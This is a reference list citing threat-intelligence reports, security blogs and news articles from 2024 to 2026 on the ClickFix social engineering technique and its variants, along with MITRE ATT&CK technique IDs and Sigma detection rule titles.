- Microsoft Threat Intelligence. "Think Before You ClickFix: Analyzing the ClickFix Social Engineering Technique." Microsoft Security Blog, August 21, 2025. https://www.microsoft.com/en-us/security/blog/2025/08/21/think-before-you-clickfix-analyzing-the-clickfix-social-engineering-technique/
- Microsoft Threat Intelligence. "Microsoft Discloses DNS-Based ClickFix Attack Using Nslookup for Malware Staging." February 2026. https://thehackernews.com/2026/02/microsoft-discloses-dns-based-clickfix.html
- ANY.RUN Malware Trends Tracker. "LummaC2 / Lumma Stealer via Fake CAPTCHA." Observed campaigns, 2024–2025. https://any.run/malware-trends/
- eSentire Threat Response Unit. "ClickFix: How to Infect Your PC in Three Easy Steps." eSentire, 2024. https://www.esentire.com/blog/clickfix-how-to-infect-your-pc-in-three-easy-steps
- Huntress Threat Intelligence. "Don't Sweat the ClickFix Techniques: Variants and Detection Evolution." Huntress Labs, September 2025. https://www.huntress.com/blog/dont-sweat-clickfix-techniques
- Unit 42 (Palo Alto Networks). "Fix the Click: Preventing the ClickFix Attack Vector." August 2025. https://unit42.paloaltonetworks.com/preventing-clickfix-attack-vector/
- Check Point Research. "FileFix: The New Social Engineering Attack Building on ClickFix Tested in the Wild." July 2025. https://blog.checkpoint.com/research/filefix-the-new-social-engineering-attack-building-on-clickfix-tested-in-the-wild/
- Trend Micro MDR. "Through the Lens of MDR: Analysis of KongTuke's ClickFix Abuse of Compromised WordPress Sites." March 2026. https://www.trendmicro.com/en_us/research/26/c/kongtuke-clickfix-abuse-of-compromised-wordpress-sites.html
- Atos Security Research. "Investigating a New Click-Fix Variant." March 2026 (via The Hacker News). https://thehackernews.com/2026/03/investigating-new-click-fix-variant.html
- ReliaQuest Threat Research (Keyes, J. & Wirth, D.). "Casting a Wider Net: ClickFix, Deno, and LeakNet's Scaling Threat." ReliaQuest, March 2026. https://reliaquest.com/blog/threat-spotlight-casting-a-wider-net-clickfix-deno-and-leaknets-scaling-threat
- ESET Threat Prevention Labs. "ClickFix Attacks Surge 517% in 2025." June 2025. https://www.infosecurity-magazine.com/news/clickfix-attacks-surge-2025/
- Sophos X-Ops. "Evil Evolution: ClickFix and macOS Infostealers." March 2026. https://www.sophos.com/en-us/blog/evil-evolution-clickfix-and-macos-infostealers
- Center for Internet Security (CIS) Cyber Threat Intelligence. "ClickFix: An Adaptive Social Engineering Technique." 2025. https://www.cisecurity.org/insights/blog/clickfix-an-adaptive-social-engineering-technique
- CSO Online. "ClickFix Techniques Evolve in New Infostealer Campaigns." March 2026. https://www.csoonline.com/article/4145123/clickfix-techniques-evolve-in-new-infostealer-campaigns.html
- Detection.FYI / SigmaHQ. "Potential ClickFix Execution Pattern — Registry" and "RunMRU Registry Key Deletion." Nextron Systems (Poudel, S.), 2025. https://detection.fyi/sigmahq/sigma/windows/registry/registry_set/registry_set_potential_clickfix_execution/
- MITRE ATT&CK Framework. Techniques T1204.002, T1204.001, T1059.001, T1218.005, T1105, T1027, T1566.002, T1608.004, T1140, T1021.002, T1071.001, T1071.004, T1070.003, T1528. https://attack.mitre.org
- Dark Reading (Nelson, N.). "'JackFix' Attack Circumvents ClickFix Mitigations." November 2025. https://www.darkreading.com/threat-intelligence/jackfix-attack-clickfix-mitigations
- Push Security. "ConsentFix: Browser-Native ClickFix Hijacks OAuth Grants." December 2025. https://pushsecurity.com/blog/consentfix
- The Hacker News. "ClickFix Attacks Expand Using Fake CAPTCHAs, Microsoft Scripts, and Trusted Web Services." January 2026. https://thehackernews.com/2026/01/clickfix-attacks-expand-using-fake.html
- CSO Online. "ClickFix Attackers Using New Tactic to Evade Detection, Says Microsoft." March 2026. https://www.csoonline.com/article/4141923/clickfix-attackers-using-new-tactic-to-evade-detection-says-microsoft.html